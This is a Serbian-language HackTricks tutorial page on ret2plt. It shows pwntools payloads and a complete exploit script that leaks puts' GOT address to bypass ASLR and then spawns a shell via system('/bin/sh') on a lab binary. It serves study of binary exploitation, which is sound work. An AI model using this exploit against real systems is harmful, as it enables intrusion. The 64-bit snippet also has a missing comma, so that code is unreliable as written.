Ret2plt

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRIJAVU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitteru 🐦 @hacktricks_live.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

Osnovne informacije

Cilj ove tehnike bio bi procuriti adresu funkcije iz PLT-a kako biste mogli zaobići ASLR. Ovo je zato što ako, na primer, procurite adresu funkcije puts iz libc-a, možete zatim izračunati gde je baza libc-a i izračunati ofsete za pristup drugim funkcijama poput system.

Ovo se može uraditi sa pwntools payload-om kao što je (ovde):

# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

Primetite kako se puts (koristeći adresu iz PLT-a) poziva sa adresom puts smeštenom u GOT (Global Offset Table). To je zato što će u trenutku kada puts štampa GOT unos za puts, ovaj unos će sadržati tačnu adresu puts u memoriji.

Takođe primetite kako se adresa main koristi u eksploataciji tako da kada puts završi izvršavanje, binarni poziva main ponovo umesto izlaska (tako da će procurila adresa i dalje biti validna).

Primetite kako je potrebno da binarni fajl nije kompajliran sa PIE ili morate imati pronađenu curenje informacija da biste zaobišli PIE kako biste znali adresu PLT-a, GOT-a i main-a. U suprotnom, prvo morate zaobići PIE.

Možete pronaći potpuni primer ovog zaobilaženja ovde. Ovo je bio konačni eksploatacijski kod iz tog primera:

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

Ostali primeri & Reference

https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html
64 bita, omogućen ASLR ali bez PIE-a, prvi korak je popuniti prelivanje do bajta 0x00 kanara, a zatim pozvati puts i procuriti ga. Sa kanarom se kreira ROP gedžet za pozivanje puts-a kako bi procurila adresa puts-a iz GOT-a, a zatim ROP gedžet za pozivanje system('/bin/sh').
https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html
64 bita, omogućen ASLR, bez kanara, prelivanje steka u glavnoj funkciji iz podfunkcije. ROP gedžet za pozivanje puts-a kako bi procurila adresa puts-a iz GOT-a, a zatim poziva jedan gedžet.

PreviousASLR NextRet2ret & Reo2pop

Last updated 1 month ago